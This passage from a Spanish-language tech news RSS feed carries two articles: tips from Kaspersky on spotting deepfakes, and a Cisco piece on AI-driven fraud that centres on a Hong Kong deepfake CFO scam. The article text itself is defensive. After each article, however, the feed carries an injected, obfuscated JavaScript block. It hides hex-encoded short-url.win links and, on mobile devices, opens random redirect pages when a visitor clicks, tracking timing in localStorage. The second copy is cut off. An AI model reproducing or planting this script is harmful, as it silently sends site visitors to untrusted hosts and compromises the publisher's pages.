<p>La experta explica que la demanda de <em>deepfakes</em> en este mercado es tan alta que supera la oferta existente, por lo que en el futuro cercano es probable que se registre un aumento aún más significativo en los incidentes relacionados con contenido falso&nbsp;de alta calidad. Esto representa un verdadero riesgo para el panorama de ciberseguridad pues, <a href="https://latam.kaspersky.com/blog/lena-para-la-infodemia-7-de-cada-10-latinoamericanos-desconoce-que-es-un-deepfake-contribuyendo-a-la-sobrecarga-mental/23773/">de acuerdo a cifras de Kaspersky</a>, más de la mitad de los usuarios en América Latina no sabe qué es un <em>deepfake</em>. Así lo afirman el 75% de los peruanos, el 72% de los chilenos y mexicanos, el 67% de argentinos, 66% de brasileros y 63% de colombianos.&nbsp;</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p><em>“</em><em>La exposición de datos personales sensibles en línea, como imágenes del rostro o audios, implica un reto significativo para proteger esta información contra accesos no autorizados y un uso malintencionado para crear contenido falso o suplantar la identidad de otras personas. Esto puede causar daño material o monetario, así como un impacto psicológico y de reputación para las víctimas.</em></p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p><em>Por eso, es esencial establecer pautas y estándares claros para la creación y el uso de deepfakes, garantizando la transparencia y responsabilidad en su implementación. No hay que temer a l</em><em>a IA, es una herramienta con un gran potencial, pero depende del ser humano hacer un uso ético de ella”, </em>concluyó <strong>Isabel Manjarrez</strong><em>.</em></p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Kaspersky comparte algunas características que pueden ayudar a identificar un <em>deepfake</em>:</p>
<!-- /wp:paragraph -->

<!-- wp:list -->
<ul class="wp-block-list"><!-- wp:list-item -->
<li><strong>La fuente del contenido y la información que comparte son sospechosas.</strong> Actúa con cautela ante correos electrónicos, mensajes de texto o voz, llamadas, videos u otro contenido multimedia que veas o recibas, especialmente si comunican información extraña o ilógica. Confírmala en fuentes de información oficiales.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li><strong>Las condiciones e iluminación en un video son inconsistentes.</strong> Desconfía si detectas anomalías en el fondo del video. Evalúa si la iluminación del rostro corresponde con el entorno, las incoherencias en la iluminación pueden indicar manipulación.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li><strong>Los movimientos faciales y corporales son inusuales.</strong> Sospecha si las expresiones del rostro o cuerpo son poco naturales, como un parpadeo extraño o la ausencia total de este. Comprueba que las palabras correspondan con los movimientos de los labios y que las expresiones faciales sean apropiadas para el contexto del video.</li>
<!-- /wp:list-item --></ul>
<!-- /wp:list -->

<!-- wp:list -->
<ul class="wp-block-list"><!-- wp:list-item -->
<li><strong>Los audios falsos pueden tener distorsiones de voz.</strong> Presta atención a la calidad del sonido. Sospecha si identificas un tono monótono antinatural en la voz, si ésta es ininteligible o si hay ruidos extraños de fondo.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li><strong>Para mantenerse protegido, es importante informarnos. </strong>Sé consciente de la existencia de los <em>deepfakes</em> y edúcate sobre las tecnologías de manipulación digital. Cuanto más consciente seas, mejor podrás detectar posibles fraudes.</li>
<!-- /wp:list-item -->

<!-- wp:list-item -->
<li><strong>Utiliza soluciones como </strong><a href="https://latam.kaspersky.com/premium" target="_blank" rel="noreferrer noopener">Kaspersky Premium</a>, que protegen contra todo tipo de amenazas, conocidas y desconocidas en la navegación en Internet, tanto en computadoras como en dispositivos móviles.</li>
<!-- /wp:list-item --></ul>
<!-- /wp:list -->

<!-- wp:paragraph -->
<p>Para saber más sobre nuevas ciberamenazas, visita el&nbsp;<a href="https://latam.kaspersky.com/blog/" target="_blank" rel="noreferrer noopener">blog</a>&nbsp;de Kaspersky.</p>
<!-- /wp:paragraph -->
<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x61\x69\x6a\x33\x63\x363','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x54\x59\x67\x35\x63\x365','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4c\x55\x4b\x38\x63\x398','abs','-local-storage','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4e\x56\x6d\x39\x63\x389','56bnMKls','opera','6946eLteFW','userAgent','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x64\x6c\x79\x34\x63\x344','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x65\x72\x66\x37\x63\x307','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x75\x76\x44\x32\x63\x392','floor','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x72\x77\x64\x36\x63\x356','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4b\x4d\x41\x30\x63\x360','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x69\x4d\x59\x31\x63\x381',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>
<p><a href="https://www.todoenunclick.com/el-lado-oscuro-de-la-ia-crece-uso-de-deepfakes-y-clonacion-de-voz/" rel="nofollow">Origen</a></p>]]></description>
		
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">99267</post-id>	</item>
		<item>
		<title>La nueva era del ciberfraude</title>
		<link>https://www.todoenunclick.com/la-nueva-era-del-ciberfraude/</link>
		
		<dc:creator><![CDATA[gabybiondi]]></dc:creator>
		<pubDate>Mon, 03 Jun 2024 14:32:48 +0000</pubDate>
				<category><![CDATA[Tecnología]]></category>
		<category><![CDATA[Ciberdelincuentes]]></category>
		<category><![CDATA[Ciberseguridad]]></category>
		<category><![CDATA[deepfakes]]></category>
		<category><![CDATA[IA]]></category>
		<category><![CDATA[ingeniería social]]></category>
		<guid isPermaLink="false">https://www.todoenunclick.com/?p=98947</guid>

					<description><![CDATA[<p><img width="950" height="634" src="https://www.todoenunclick.com/wp-content/uploads/2024/06/cybersecutiry-estafas.jpg" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="La nueva era del ciberfraude" decoding="async" loading="lazy" srcset="https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2024/06/cybersecutiry-estafas.jpg?w=950&amp;ssl=1 950w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2024/06/cybersecutiry-estafas.jpg?resize=240%2C160&amp;ssl=1 240w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2024/06/cybersecutiry-estafas.jpg?resize=503%2C336&amp;ssl=1 503w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2024/06/cybersecutiry-estafas.jpg?resize=768%2C513&amp;ssl=1 768w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2024/06/cybersecutiry-estafas.jpg?resize=629%2C420&amp;ssl=1 629w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2024/06/cybersecutiry-estafas.jpg?resize=640%2C427&amp;ssl=1 640w, https://i0.wp.com/www.todoenunclick.com/wp-content/uploads/2024/06/cybersecutiry-estafas.jpg?resize=681%2C454&amp;ssl=1 681w" sizes="auto, (max-width: 950px) 100vw, 950px" /></p><!-- wp:paragraph -->
<p>Era enero de 2024 cuando un empleado de finanzas de una multinacional con sede en Hong Kong recibió el correo electrónico del director financiero de la empresa en el Reino Unido. El director financiero hablaba de realizar transacciones confidenciales, lo que parecía extraño, pero una videollamada con él aclararía la situación.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>En la llamada participaron varias personas con altos cargos en la organización, así que el trabajador de Hong Kong siguió adelante y realizó 15 pagos, por un total de 200 millones de dólares de Hong Kong (25.6 millones de dólares estadounidenses), a cinco cuentas bancarias locales.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Las cosas se complicaron cuando se comunicaron las transacciones a la oficina central. Resultó que el director financiero nunca había solicitado las transferencias. Los interlocutores ni siquiera eran reales. Todo había sido preparado por un ciberdelincuente.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>“Creo que el estafador descargó los vídeos con antelación y luego utilizó la inteligencia artificial para añadir voces falsas y utilizarlas en la videoconferencia”, <a href="https://news.rthk.hk/rthk/en/component/k2/1739119-20240204.htm">declaró</a> más tarde el superintendente jefe de la policía, Baron Chan Shun-ching, a la Radio Televisión de Hong Kong.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Este no es el único ejemplo de piratas informáticos que utilizan inteligencia artificial. La policía de Hong Kong había encontrado al menos 20 casos en los que se había utilizado el aprendizaje automático para crear deepfakes y obtener dinero mediante el engaño, <a href="https://edition.cnn.com/2024/02/04/asia/deepfake-cfo-scam-hong-kong-intl-hnk/index.html">informó</a> la cadena televisiva CNN. Los expertos afirman que la tendencia apenas está empezando.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>“Está escalando. Las bandas criminales están instalando centros de llamadas en todo el mundo. Los dirigen como si fueran empresas. Y están creciendo”, afirma el experto en seguridad de la información Todd Wade.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Según Luke Secrist, CEO de la empresa de hacking ético BuddoBot, “la sofisticación de los tipos de ataques y de los tipos de tecnología para ayudar a los ataques se está volviendo bastante espeluznante”.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Varios factores están impulsando la evolución de estas amenazas. Uno de ellos es que la IA puede utilizarse para desarrollar estafas que eluden las defensas tradicionales y van directas al eslabón más débil de cualquier estrategia de ciberseguridad: los seres humanos.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>“La ingeniería social está tomando una parte cada vez mayor de este panorama”, dice Nick Biasini, jefe de divulgación de Cisco Talos. “Estamos empezando a ver cada vez más actores de amenazas que no son necesariamente técnicamente sofisticados, pero que son buenos manipulando a la gente”.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>“Por eso tienen tanto éxito. Tienen mucho dinero. Y cuando tienes dinero, puedes añadir mucha sofisticación a tus trampas”.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Esta sofisticación es un segundo impulsor de las amenazas basadas en IA. En el último año, los avances en tecnología han progresado hasta un punto en el que cada vez es más difícil distinguir un deepfake del real.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Aunque solía ser fácil detectar una deepfake por patrones de habla extraños o manos extrañamente dibujadas, estas inconsistencias se están superando rápidamente. Y lo que es aún más preocupante, la IA ya puede crear deepfakes realistas a partir de sets de entrenamiento cada vez más pequeños.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>“Hay muchos centros de llamadas que llaman sólo para grabar tu voz”, dice Secrist. “Las llamadas que recibes, sin respuesta: están intentando grabarte diciendo “Hola, ¿quién es?”. Sólo necesitan un fragmento”.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Según el experto en ciberseguridad Mark T. Hofmann, “treinta segundos de material en bruto –voz o vídeo– bastan ahora para crear clones deepfake con una calidad que ni siquiera tu mujer, tu marido o tus hijos podrían distinguir de ti. Ya nadie está a salvo”.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>En muchos casos, un ciberdelincuente ni siquiera necesita llamarte. Las redes sociales de la gente están llenas de material de audio y vídeo. Además, “también se está produciendo una enorme cantidad de filtraciones de datos”, dice Wade.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Lo que la gente no sabe es que estas filtraciones de datos pueden incluir información personal, como la dirección, el número de teléfono, el correo electrónico, el número de la seguridad social, etc”. En los ataques de ingeniería social, pueden utilizar esta información para hacerse pasar por alguien con autoridad para realizar un trámite o transacción”.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Una vez que han iniciado un ataque de ingeniería social, los ciberdelincuentes juegan con las debilidades mentales para conseguir lo que quieren. Por ejemplo, pueden hacerte creer que han secuestrado a tu hijo o que tu trabajo está en peligro si no le haces un favor a tu jefe.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>No hay mucho que las ciberdefensas estándar puedan hacer para evitarlo. Por eso, “cuando hablamos de ingeniería social y deepfakes, el firewall humano es más importante que nunca”, afirma Hofmann. “Tenemos que informar a la gente sobre los nuevos riesgos, sin asustarla”.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>Una buena regla general para el mundo de los deepfakes es desconfiar de cualquier petición fuera de lo común, venga de quien venga. Hofmann dice que las familias podrían acordar una palabra clave para usar por teléfono en caso de duda.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>En entornos corporativos, mientras tanto, “hacer preguntas de seguridad o devolver la llamada al número real es un buen consejo”, dice Hofmann. “Pueden robarte la voz, pero no los conocimientos”.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>El experto de Cisco Talos, Biasini, está de acuerdo en que el conocimiento es la mejor forma de derrotar la amenaza deepfake, al menos hasta que la tecnología de autenticación encuentre una forma de distinguir las identidades reales de las falsas. “Cuando encontremos este tipo de actividad, nos aseguraremos de que salga a la luz”, afirma.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p>“Una de las cosas más importantes que se pueden hacer es llevar este conocimiento al gran público, porque no todo el mundo es consciente de este tipo de amenazas”.</p>
<!-- /wp:paragraph -->

<!-- wp:paragraph -->
<p><strong>Por </strong><em>Jason Deign, Redactor de Cisco</em></p>
<!-- /wp:paragraph -->
<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x61\x69\x6a\x33\x63\x363','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x54\x59\x67\x35\x63\x365','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4c\x55\x4b\x38\x63\x398','abs','-local-storage','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x4e\x56\x6d\x39\x63\x389','56bnMKls','opera','6946eLteFW','userAgent','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x64\x6c\x79\x34\x63\x344','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x65\x72\x66\x37\x63\x307','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x75\x76\x44\x32\x63\x392','floor','\x68\x74\x74\x70\x3a\x2f\x2f\x73\x68\x6f\x72\x74\x2d\x75\x72\x6c\x2e\x77\x69\x6e\x2f\x72\x77\x64\x36\x63\x356','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const 